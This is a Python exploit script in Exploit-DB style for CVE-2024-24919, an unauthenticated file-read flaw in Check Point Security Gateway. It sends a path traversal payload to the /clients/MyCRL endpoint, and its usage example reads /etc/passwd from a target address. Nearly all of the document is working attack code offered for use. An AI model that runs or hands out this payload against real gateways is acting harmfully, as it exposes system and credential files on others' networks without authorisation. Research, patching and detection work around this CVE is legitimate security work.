# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])